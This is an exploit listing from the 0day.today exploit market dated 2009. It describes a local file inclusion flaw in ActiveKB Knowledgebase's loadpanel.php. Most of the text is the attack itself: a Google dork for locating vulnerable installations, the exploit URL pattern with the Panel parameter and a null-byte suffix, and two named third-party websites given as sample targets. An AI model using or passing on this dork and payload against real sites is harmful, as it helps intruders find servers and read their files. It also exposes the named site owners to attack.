[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln

Author
Angela Chang
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4989
Category
web applications
Date add
02-04-2009
Platform
unsorted
======================================================================
ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln
======================================================================


[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software  : ActiveKB Knowledgebase version X.X                                      |
 |  Vendor    : http://www.interspire.com/activekb/                                     |
 |  Date      : 02 April 2009                                                           |
 |  Author    : Angela Chang                                                            |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by ActiveKB Knowledgebase Software"
    inurl:loadpanel.php?Panel=

[»] Vulnerable

    ./loadpanel.php

[»] Exploit

    http://[site]/[path]/loadpanel.php?Panel=[LFI]%00

[»] Sample

    http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
    http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00



#  0day.today [2024-12-25]  #